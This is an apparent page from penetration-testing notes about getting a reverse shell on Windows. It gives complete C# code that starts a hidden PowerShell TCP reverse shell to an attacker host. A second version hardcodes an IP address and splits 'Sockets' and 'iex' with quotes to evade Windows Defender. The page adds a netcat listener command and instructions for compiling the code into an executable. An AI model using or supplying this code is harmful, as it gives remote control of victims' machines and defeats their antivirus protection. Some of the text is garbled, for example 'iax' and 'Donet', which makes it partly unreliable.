Reverse shell

Create reverse shell on windows

Reverse shell for windows - Splunk

GitHub - 0xjpuff/reverse_shell_splunk: A simple splunk package for obtaining reverse shells on both Windows and most *nix systems.GitHub

C## code to get a reverse shell from a Windows machine

Make sure to change 'Attacker_IP' and 'Attacker_Port' to your attacker machine and desired port.

using System;
using System.Diagnostics;

class Program
{
    static void Main()
    {
        ProcessStartInfo startInfo = new ProcessStartInfo();
        startInfo.FileName = "powershell.exe";
        startInfo.Arguments =  "-NoProfile -ExecutionPolicy Bypass -Command \"$client = New-Object System.Net.Sockets.TCPClient('Attacker_ip', Attacker_port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";
        startInfo.RedirectStandardOutput = true;
        startInfo.UseShellExecute = false;
        startInfo.CreateNoWindow = true;

        using (Process process = Process.Start(startInfo))
        {
            using (System.IO.StreamReader reader = process.StandardOutput)
            {
                string result = reader.ReadToEnd();
                Console.WriteLine(result);
            }
        }
    }
}

To Bypass the windows antivirus (Defender), you can use ''" on So''"ckets and on i''"ex. Your Powershell code will become:

   $client = New-Object System.Net.So""ckets.TCPClient('172.25.172.73', 443);
  $stream = $client.GetStream();
  [byte[]]$bytes = 0..65535|%{0};
  while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
      $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
      $sendback = (i""ex $data 2>&1 | Out-String );
      $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
      $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
      $stream.Write($sendbyte,0,$sendbyte.Length);
      $stream.Flush()
  };
  $client.Close()

If you don't put the brackets, Antivirus will block the attempt and you will get this error:

Putting the quotes "" or '' between the iax and socket, will make the Antivirus Defender see it while the powershell will treat the quotes as comment and ignore them resulting into concatenate of the string, s"ocket becomes socket and i''ax becomes iax. This is a technique to bypass the Defender antivirus.

POC:

nc -lvpn 1235

Compile C## to executable (exe)

Option 1: Donet CLI

Install .NET SDK: First, ensure you have the .NET SDK installed on your machine. You can download it from Microsoft's .NET website.
Create a new project: Open a terminal or command prompt and create a new console project using the following command:
shCopy
```
dotnet new console -o MyPowerShellApp
```
This command creates a new folder named MyPowerShellApp with a basic console application.
Replace Program.cs: Navigate to the new project folder:
shCopy
```
cd MyPowerShellApp
```
Replace the content of Program.cs with your C# code.
Install required package: Add the System.Management.Automation package to your project by running:
shCopy
```
dotnet add package System.Management.Automation
```
Compile the project: To compile your project into an executable, run:
shCopy
```
dotnet publish -c Release -r win-x64 --self-contained
```
This command will create an executable in the bin\Release\net6.0\win-x64\publish directory.

Option 2: Open Visual Studio

Open Visual Studio: Launch Visual Studio and create a new project.
Create a New Console App: Go to File > New > Project, select Console App (.NET Core) or Console App (.NET Framework) depending on your preference.
Add Your Code: Replace the content of Program.cs with your C# code that runs the PowerShell script.
Optional: Add Required NuGet Packages: Right-click on your project in the Solution Explorer, select Manage NuGet Packages, search for System.Management.Automation, and install it.
Build Your Project: Click Build > Build Solution or press Ctrl+Shift+B to compile your code into an .exe file. You'll find the executable in the bin\Debug\netcoreappX.X\ or bin\Release\netcoreappX.X\ folder depending on your build configuration.

The executable complied code should be available on under the the bin folder:

PreviousWindows useful commands NextPrivilege escalation

Last updated 1 day ago